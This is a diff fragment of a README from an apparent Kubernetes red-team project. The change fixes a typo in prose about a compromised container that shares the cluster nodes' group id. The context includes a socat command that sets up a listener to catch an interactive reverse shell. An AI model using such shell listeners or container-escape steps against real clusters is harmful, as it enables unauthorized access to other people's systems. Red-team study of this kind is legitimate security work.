TheSecureTux/redteam-k8spwn/README.md

         socat file:`tty`,raw,echo=0 tcp-listen:9532

 At this point we have direct access to the docker.
-The fun part of the deal though is that the deployment also assigned the container the same group id as the kubernetes noes, like this:
+The fun part of the deal though is that the deployment also assigned the container the same group id as the kubernetes nodes, like this:

         spec:
           securityContext: